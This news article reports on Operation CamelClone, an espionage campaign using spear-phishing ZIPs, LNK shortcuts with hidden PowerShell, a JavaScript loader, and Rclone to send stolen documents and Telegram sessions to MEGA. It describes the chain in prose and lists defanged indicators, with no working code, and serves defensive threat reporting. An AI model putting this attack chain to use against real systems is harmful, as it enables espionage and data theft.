CamelClone Uses Public File-Sharing Sites in Government Cyberattacks

A new cyber espionage campaign dubbed Operation CamelClone, targeting government and strategic sectors across several geopolitically significant regions.

The campaign abuses legitimate tools and public file‑sharing platforms to deliver malware and steal sensitive data, making it harder for defenders to detect.

The operation primarily targets organizations linked to government and national security interests. Industries affected include:

• Government agencies.
• Defense and military organizations.
• Foreign affairs and diplomatic institutions.
• Policy and international cooperation departments.
• Energy and strategic resource sectors.

Researchers observed activity targeting Algeria, Mongolia, Ukraine, and Kuwait. Although these countries appear unrelated, each plays a key role in current geopolitical dynamics.

Ukraine remains at the center of the ongoing conflict with Russia, while Algeria’s role as a major energy exporter places it at the intersection of European, Russian, and Chinese interests.

Seqrite Labs APT Team has been monitoring threats across the globe and recently identified a campaign targeting multiple countries.

Mongolia’s diplomatic balancing between Western nations and its neighbors China and Russia makes it an attractive intelligence target.

Meanwhile, Kuwait remains an important defense and security partner in the Gulf region. The lure themes used in the attacks closely mirror these geopolitical tensions.

Spear‑Phishing Lures

The campaign begins with malicious ZIP archives distributed via spear‑phishing. These archives contain a shortcut (LNK) file and a decoy image designed to appear legitimate.

Researchers first identified the campaign after discovering a file uploaded to VirusTotal named وزارة_السكن_والعمران_والمدينة png.zip, submitted from Algeria.

The Arabic filename translates to “Ministry of Housing, Urban Development, and the City,” suggesting the attackers attempted to impersonate an Algerian government entity.

Further analysis revealed additional lures targeting different regions:

• “Expanding cooperation with China.zip” aimed at Mongolian government institutions.
• “Algerian Ukrainian proposals for cooperation.zip” referencing diplomatic collaboration.
• “Weapons requirements for the Kuwait Air Force.zip” targeting defense procurement personnel.

Each archive contained a decoy image featuring official logos from real organizations, such as Algeria’s Ministry of Housing, Mongolia’s state‑owned nuclear energy company MonAtom LLC, and the Kuwaiti Armed Forces.

The attack chain begins when a victim opens the malicious LNK shortcut file inside the ZIP archive. The shortcut executes a hidden PowerShell command that downloads additional payloads from the anonymous file‑sharing site filebulldogs[.]com.

The threat actor also deploys another lure document from the remote C2 server, which is part of the later stage of the infection chain.

The downloaded payload is a JavaScript loader tracked by researchers as HOPPINGANT. The script runs using Windows Script Host and executes Base64‑encoded PowerShell commands to fetch additional components and prepare the system for data theft.

During the next stage, the loader downloads:

• A decoy PDF document padded with null bytes to distract victims.
• A secondary archive containing an executable file named l.exe.

Analysis revealed that l.exe is a legitimate version of Rclone (v1.70.3), a widely used command‑line tool designed to synchronize files with cloud storage services.

Data Exfiltration via Rclone and MEGA

Once executed, the script configures Rclone to connect to MEGA cloud storage using credentials hidden within the malware through a simple XOR‑encoded password.

The attackers create remote storage profiles using anonymous onionmail[.]org email addresses, including:

• coreyroberson@onionmail[.]org.
• keatonwalls@onionmail[.]org.
• oliwiagibbons@onionmail[.]org.
• theresaunderwood@onionmail[.]org.

The malware then collects documents from the victim’s system, focusing on files located in the Desktop directory such as .doc, .docx, .pdf, and .txt formats.

It also attempts to steal Telegram Desktop session data, which could allow attackers to access private communications.

All collected files are uploaded to MEGA using Rclone with identical configuration settings across all observed samples.

Instead of deploying traditional command‑and‑control servers, the threat actors rely on public services.

The filebulldogs[.]com platform hosts the malware loader, payload archives, and decoy files. Different upload paths are used for each campaign instance, allowing attackers to operate multiple operations simultaneously while reducing the risk of disruption.

Researchers have not attributed Operation CamelClone to any known threat group. However, the campaign’s focus on government, defense, diplomatic, and energy organizations suggests a cyber‑espionage objective rather than financial gain.

Seqrite Labs continues to monitor the activity and believes the campaign reflects an intelligence‑gathering effort aimed at understanding the foreign policy positions, defense capabilities, and diplomatic alignments of countries navigating global geopolitical rivalries.

IOCs

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.